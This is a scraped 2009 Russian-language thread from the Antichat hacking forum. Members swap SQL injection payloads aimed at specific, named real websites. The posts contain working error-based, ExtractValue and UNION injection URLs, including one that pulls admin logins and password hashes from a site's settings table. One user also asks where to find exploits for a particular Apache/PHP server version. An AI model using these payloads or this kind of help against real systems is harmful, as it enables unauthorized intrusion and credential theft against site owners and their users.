Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.12.2009, 11:09
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
v1d0qz
http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'
|
|
|
29.12.2009, 13:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от mental2
Вот немогу понять почему вот так выводиться
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+1='1/
а вот так не.
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+(SELECT+id+from+catalogue_fin+where+i d=1+LIMIT+1)='1/
Да и вообще как можно раскрутить в данной ситуации, а то уже все перепробывал..
скрипт странно реагирует на точку '.', в связи с чем с ходу не удалось составить запрос в другую базу, зато по ошибке:
in /usr/home/hosting/public_html/webadmin/inc/pvp.php on line 55
находим админку <скрыто>/webadmin/login.php, которая также страдает фрагментированной sqli, но и её не получилось раскрутить в связи с тем что пароль передается в виде md5, зато по выводимомой ошибке можно составить запрос в 1 sqli:
SELECT id, AdminLogin, AdminOpnWin,lock_user,lock_time FROM settings WHERE AdminLogin like binary '\' and AdminPassword='d41d8cd98f00b204e9800998ecf8427e'"
http://www.скрыто_по_просьбе_автора. ru/clients'*ExtractValue(1,concat(1,(select(concat(Ad minLogin,AdminPassword))from(settings)where(id=1)) ))*'1/
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 02.01.2010 в 23:13..
|
|
|
|
29.12.2009, 16:11
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 16:56
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
сорри но там нету решение как в\обойти если не выводится инфо с колонок
пример:
(%53elect+top+1+Post_count+from+Total)--
всегда ответ одинаковый
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
|
|
|
|
29.12.2009, 17:37
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
YuNi|[c, там в целом речь о MySQL.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 19:01
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
jokester
Так и знал что там можно всё через дупликат красиво оформить.
Сообщение от v1d0qz
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
Сообщение от Bramin
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
Ой сорри, было очень поздно, на втыке написал)
там должно было быть
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/
Вы главное не нервничайте, всё будет хорошо 
Последний раз редактировалось v1d0qz; 18.04.2010 в 13:47..
|
|
|
|
29.12.2009, 22:57
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Не могу раскрутить скуль
https://hiphop-dojo.com/order/cart.php?id=939'
|
|
|
|
29.12.2009, 23:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
https://hiphop-dojo.com/order/cart.php?id=939'+and+1=(select+*+from(select+*+fro m(select+name_const((select+table_name+from+inform ation_schema.tables+limit+0,1),14)d)+as+t+join+(se lect+name_const((select+table_name+from+informatio n_schema.tables+limit+0,1),14)e)b)a)--+
|
|
|
|
30.12.2009, 00:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от Micr0b
Не могу раскрутить скуль
https://hiphop-dojo.com/order/cart.php?id=939'
https://hiphop-dojo.com/order/cart.php?id=-939'+union+select+1,2,3,version(),5,6,7,8,9,10+--+
|
|
|
|
30.12.2009, 00:12
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
Есть такой сервер: Apache/2.2.2 (ASPLinux) PHP/5.1.2
Не буду вдаваться в заумные слова. Есть ли хорошие дыры в этой вещи? Нормальный сплойтов не нашел(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
